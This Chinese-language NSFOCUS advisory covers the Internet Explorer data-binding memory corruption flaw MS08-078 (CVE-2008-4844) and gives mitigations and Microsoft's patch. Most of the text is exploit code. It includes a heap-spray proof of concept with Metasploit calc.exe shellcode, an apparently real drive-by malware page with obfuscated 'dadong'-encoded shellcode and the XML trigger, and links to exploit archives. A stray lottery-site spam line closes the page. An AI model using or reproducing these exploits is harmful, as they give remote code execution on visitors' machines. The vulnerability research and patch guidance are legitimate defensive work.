首頁 -> 安全研究

安全研究

安全漏洞
Microsoft IE對象處理內存破壞漏洞(MS08-078)

發布日期:2008-12-07
更新日期:2008-12-10

受影響系統:
Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.01
描述:
BUGTRAQ  ID: 32721
CVE(CAN) ID: CVE-2008-4844

Internet Explorer是微軟公司開發的廣為流行的網絡瀏覽器。

Internet Explorer的數據綁定函數中無效的指針引用導致遠程代碼執行漏洞。如果啟用了數據綁定(默認狀態),在某些情況下未經更新數組長度就釋放了對象,這可能允許訪問已刪除對象的內存空間,導致Internet Explorer以可利用的狀態退出。
    
攻擊者可以通過創建特制網頁來利用這個漏洞。當用戶查看網頁時,漏洞可能允許遠程代碼執行。成功利用這個漏洞的攻擊者可以獲得與登錄用戶相同的權限。

此漏洞目前被掛馬攻擊者積極利用來向用戶系統植入惡意軟件。

<*鏈接:http://www.scanw.com/blog/archives/303
        http://www.microsoft.com/technet/security/advisory/961051.mspx
        http://secunia.com/advisories/33089/
        http://www.avertlabs.com/research/blog/index.php/2008/12/09/yet-another-unpatched-drive-by-exploit-found-on-the-web/
        http://research.eeye.com/html/alerts/zeroday/20081209.html
        http://www.microsoft.com/technet/security/Bulletin/MS08-078.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA08-352A.html
*>

測試方法:

警 告

以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!

<html>
<script>

    // k`sOSe 12/10/2008
    // Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
    // Heap spray address adjusted for Vista - muts / offensive-security.com
    // http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
    // http://www.offensive-security.com/0day/iesploit-vista.rar
    // windows/exec - 141 bytes
    // http://www.metasploit.com                                                                    
    // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe    
    var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
      var block = unescape("%u0c0c%u0c0c");
    var nops = unescape("%u9090%u9090%u9090");


    while (block.length < 81920) block += block;
    var memory = new Array();
    var i=0;
    for (;i<1000;i++) memory[i] += (block + nops + shellcode);

    document.write("<iframe src=\"iframe.html\">");

</script>


</html>


<!-- iframe.html

<XML ID=I>
    <X>
        <C>
            <![CDATA[
                <image
                    SRC=http://&#3084;&#3084;.xxxxx.org            
                >
             ]]>
            
        </C>
    </X>
</XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
    <XML ID=I>
    </XML>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
    </SPAN>
</SPAN>

-->



&lt;script language=&quot;javascript&quot;&gt;
if(navigator.userAgent.toLowerCase().indexOf(&quot;msie 7&quot;)==-1)location.replace(&quot;about:blank&quot;);

function sleep(milliseconds)
{
var start=new Date().getTime();

for(var i=0;i&lt;1e7;i++)
{if((new Date().getTime()-start)&gt;milliseconds)
{break}
}
}

function spray(sc)
{
var infect=unescape(sc.replace(/dadong/g,&quot;\x25\x75&quot;));
var heapBlockSize=0x100000;
var payLoadSize=infect.length*2;
var szlong=heapBlockSize-(payLoadSize+0x038);
var retVal=unescape(&quot;%u0a0a%u0a0a&quot;);
retVal=getSampleValue(retVal,szlong);
aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
zzchuck=new Array();
for(i=0;i&lt;aaablk;i++){zzchuck=retVal+infect}
}

function getSampleValue(retVal,szlong)
{
while(retVal.length*2&lt;szlong)
{retVal+=retVal}
retVal=retVal.substring(0,szlong/2);
return retVal
}

var a1=&quot;dadong&quot;;
spray(a1+&quot;9090&quot;+a1+&quot;dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031Cdadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122dadong4921dadong0121dadong2121dadong214BdadongF1DEdadong2198dadong2131dadongAA21dadongCAD9dadong7F24dadong85D2dadongF1DEdadongD7C9dadongDEDEdadongC9DEdadong221Cdadong2121dadongD9AAdadong19C9dadong2121dadongC921dadong206Cdadong2121dadong67C9dadong2121dadongC921dadong22FAdadong2121dadongD9AAdadong03C9dadong2121dadongC921dadong2065dadong2121dadong11C9dadong2121dadongC921dadong22A8dadong2121dadongD9AAdadong2DC9dadong2121dadongC921dadong2040dadong2121dadong3BC9dadong2121dadongCA21dadong7279dadongFDAAdadong4B72dadong4961dadong3121dadong2121dadongC976dadong2390dadong2121dadongC4C9dadong2121dadong7921dadong72E2dadongFDAAdadong4B72dadong4901dadong3121dadong2121dadongC976dadong23B8dadong2121dadongECC9dadong2121dadong7921dadong76E2dadong1DC9dadong2125dadongAA21dadong12D9dadong68E8dadongE112dadongE291dadongD3DDdadongAC8FdadongDE66dadongE27Edadong1F7Adadong26E7dadong1F99dadong7EA8dadong4720dadongE61Fdadong2466dadongC1DEdadongC8E2dadong25B4dadong2121dadongA07Adadong35CDdadong2120dadongAA21dadong1FF5dadong23E6dadong4C42dadong0145dadongE61Fdadong2563dadong420Edadong0301dadongE3A2dadong1229dadong71E1dadong4971dadong2025dadong2121dadong7273dadongC971dadong22E0dadong2121dadongF1DEdadongDDAAdadongE6AAdadongE1A2dadong1F29dadong39ABdadongFAA5dadong2255dadongCA61dadong1FD7dadong21E7dadong1203dadong1FF3dadong71A9dadongA220dadong75CDdadongE112dadongFA12dadongEDAAdadongD9A2dadong5C75dadong1F28dadong3DA8dadongA220dadong25E1dadongD3CAdadongEDAAdadongF8AAdadongE2A2dadong1231dadong1FE1dadong62E6dadong200Ddadong2121dadong7021dadong7172dadong7171dadong7171dadong7671dadongC971dadong2218dadong2121dadong38C9dadong2121dadong4521dadong2580dadong2121dadongAC21dadong4181dadongDEDEdadongC9DEdadong2216dadong2121dadongFA12dadong7272dadong7272dadongF1DEdadong19A1dadongA1C9dadongC819dadong2E54dadong59A0dadongB124dadongB1B1dadong55B1dadong7427dadongCDAAdadong61ACdadongDE24dadongC9C1dadongDE0FdadongDEDEdadongC9E2dadongDE09dadongDEDEdadong3099dadong2520dadongE3A1dadong212Ddadong3AC9dadongDEDEdadong12DEdadong71E1dadongC975dadong2175dadong2121dadongC971dadong23AAdadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong2360dadong2121dadongDE12dadongDE76dadongC9F1dadong20DAdadong2121dadongDE49dadong2121dadongDE21dadongC9F1dadongDFC9dadongDEDEdadong7672dadong1277dadong71E1dadongC975dadong213Fdadong2121dadongC971dadong2374dadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong232Adadong2121dadongDE12dadongDE76dadong79F1dadong7E7FdadongE27Adadong23CAdadongE279dadongD8C9dadongDEDEdadong77DEdadongA276dadong29CDdadongDDAAdadong294Bdadong1F76dadong56DEdadongC935dadong237Cdadong2121dadongF1DEdadongDDAAdadong4049dadong444Cdadong4921dadong6468dadong5367dadongD5AAdadong2998dadong2121dadongD221dadong5487dadong4B0Edadong1F21dadong55DEdadong0105dadong05C9dadong2123dadongDE21dadongAAF1dadongC9D9dadong20EAdadong2121dadongF1DEdadongD91Adadong2955dadongAA17dadong0565dadong1F01dadong21DEdadongDE1Fdadong0555dadongC93Ddadong20CEdadong2121dadongF1DEdadongE5A2dadong7E31dadong997Fdadong2120dadong2121dadong49E2dadong4F4Edadong2121dadong5449dadong4D53dadongCA4CdadongAC34dadong0565dadong7125dadong03C9dadongDEDFdadong71DEdadong6BC9dadong2123dadongC821dadongDFC3dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong29E5dadong4BE2dadong494Ddadong554Fdadong4D45dadong34CAdadong65ACdadong2505dadongC971dadongDCDAdadongDEDEdadongC971dadong2302dadong2121dadong9AC8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong1249dadong2113dadong4921dadong5254dadong5344dadong34CAdadong65ACdadong2505dadongC971dadongDCF0dadongDEDEdadongC971dadong20D8dadong2121dadongB0C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong4249dadong5657dadong4921dadong4952dadong4E45dadong34CAdadong65ACdadong2505dadongC971dadongDC86dadongDEDEdadongC971dadong20EEdadong2121dadong46C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong5749dadong5946dadongCA21dadongAC34dadong0565dadong7125dadongA3C9dadongDEDCdadong71DEdadong8BC9dadong2120dadongC821dadongDF63dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong25E5dadongC9E2dadong208Adadong2121dadong3A49dadong67E7dadong7158dadongE7C9dadong2120dadongA221dadong29E5dadongC9E2dadong20B6dadong2121dadongCD49dadong22B6dadong712Ddadong93C9dadong2120dadongA221dadong29E5dadongC9E2dadong20A2dadong2121dadong8B49dadong2CDDdadong715DdadongBFC9dadong2120dadongA221dadong29E5dadongC9E2dadong204Edadong2121dadongCC49dadongCE77dadong7117dadongABC9dadong2120dadongA221dadong29E5dadongC9E2dadong207Adadong2121dadongD149dadong25ABdadong717Edadong57C9dadong2120dadongA221dadong29E5dadongC9E2dadongDFD6dadongDEDEdadong5949dadongFA49dadong713Ddadong43C9dadong2120dadongA221dadong29E5dadongC9E2dadong2012dadong2121dadongCE49dadongC1EFdadong7141dadong6FC9dadong2120dadongA221dadong29E5dadongC9E2dadong203Edadong2121dadong9149dadong0C68dadong71FAdadong1BC9dadong2120dadongA221dadong29E5dadongC9E2dadongDE17dadongDEDEdadong8A49dadongBA7Fdadong713Fdadong07C9dadong2120dadongA221dadong29E5dadongC9E2dadongDF86dadongDEDEdadong7849dadongA0B6dadong7123dadong33C9dadong2120dadongA221dadong29E5dadongC9E2dadong21C2dadong2121dadong5F49dadongC3F9dadong7152dadongDFC9dadong2121dadongA221dadong29E5dadongC9E2dadong21EEdadong2121dadongBF49dadong9AD8dadong7114dadongCBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDFB3dadongDEDEdadong7649dadong9481dadong719AdadongF7C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF5FdadongDEDEdadong3B49dadong3F5Bdadong7123dadongE3C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF4BdadongDEDEdadongC149dadong117Adadong71B5dadong8FC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF77dadongDEDEdadongB649dadongC3E8dadong7182dadongBBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF63dadongDEDEdadong4949dadongE405dadong7192dadongA7C9dadong2121dadongA221dadong29E5dadongC9E2dadong2176dadong2121dadong5349dadong92DFdadong7137dadong53C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF65dadongDEDEdadong32CAdadong444BdadongC971dadongDAD6dadongDEDEdadongC971dadongDF8AdadongDEDEdadong96C8dadongDEDDdadongC9DEdadongDEC9dadongDEDEdadongC9E2dadongDC88dadongDEDEdadong6E49dadong6ECEdadong7124dadong1FC9dadong2121dadongA221dadong29E5dadongC9E2dadong212Edadong2121dadongAF49dadong2F6Fdadong71CDdadong0BC9dadong2121dadongA221dadong29E5dadong12E2dadong45E1dadong61AAdadongA411dadong59E1dadong1F31dadong61AAdadong1F2Ddadong51AAdadong8C3DdadongAA1Fdadong2961dadongCAE2dadong1F2Adadong61AAdadongA215dadong5DE1dadongAA1Fdadong1D61dadong41E2dadongAA17dadong054Ddadong1705dadong64AAdadong171Ddadong75AAdadong5924dadongF422dadongAA1Fdadong396BdadongAA1Fdadong017BdadongFC22dadong1AC2dadong1F68dadong15AAdadong22AAdadong12D4dadong12DEdadongDDE1dadongA58Ddadong55E1dadongE026dadong2CEEdadongD922dadongD5CAdadong1A17dadong055Ddadong5409dadong1FFEdadong7BAAdadong2205dadong47FCdadongAA1Fdadong6A2DdadongAA1Fdadong3D7BdadongFC22dadongAA1FdadongAA25dadongE422dadongA817dadong0565dadong403DdadongC9E2dadongDA47dadongDEDEdadong5549dadong5155dadong0E1Bdadong560Edadong5656dadong430Fdadong4840dadong444Adadong0F42dadong4F42dadong450Edadong564Edadong0E4Fdadong4E4Adadong440Fdadong4459dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong0021&quot;);

sleep(3000);

nav=navigator.userAgent.toLowerCase();
if(navigator.appVersion.indexOf(&#039;MSIE&#039;)!=-1)
{
version=parseFloat(navigator.appVersion.split(&#039;MSIE&#039;)[1])
}
if(version==7)
{
w2k3=((nav.indexOf(&#039;windows nt 5.2&#039;)!=-1)||(nav.indexOf(&#039;windows 2003&#039;)!=-1));
wxp=((nav.indexOf(&#039;windows nt 5.1&#039;)!=-1)||(nav.indexOf(&#039;windows xp&#039;)!=-1));
if(wxp||w2k3)document.write(&#039;&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;image SRC=http://r.r.book.com src=http://www.google.com]]&gt;&lt;![CDATA[&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;XML ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;&#039;);
var i=1;while(i&lt;=10)
{
window.status=&quot; &quot;;i++}
}
&lt;/script&gt;

http://milw0rm.com/sploits/2008-iesploit.tar.gz

建議:
臨時解決方法:

如果您不能立刻安裝補丁或者升級,NSFOCUS建議您采取以下措施以降低威脅:

* 將Internet Explorer配置為在Internet和本地Intranet安全區域中運行ActiveX控件之前進行提示。
* 將Internet和本地intranet安全區設置為“高”以在運行ActiveX控件和活動腳本之前要求提示。
* 禁用XML Island功能。
* 通過完整性級別ACL限制Internet Explorer使用OLEDB32.dll。
* 禁用OLEDB32.dll的Row Position功能。
* 注銷OLEDB32.DLL。
* 使用ACL禁用OLEDB32.DLL。
* 在Internet Explorer 8 Beta 2中禁用數據綁定支持。

廠商補丁:

Microsoft
---------
Microsoft已經為此發布了一個安全公告(MS08-078)以及相應補丁:
MS08-078:Security Update for Internet Explorer (960714)
鏈接:http://www.microsoft.com/technet/security/Bulletin/MS08-078.mspx?pf=true

瀏覽次數:15208
嚴重程度:0(網友投票)
本安全漏洞由綠盟科技翻譯整理,版權所有,未經許可,不得轉載
綠盟科技給您安全的保障
海南七星彩彩票官网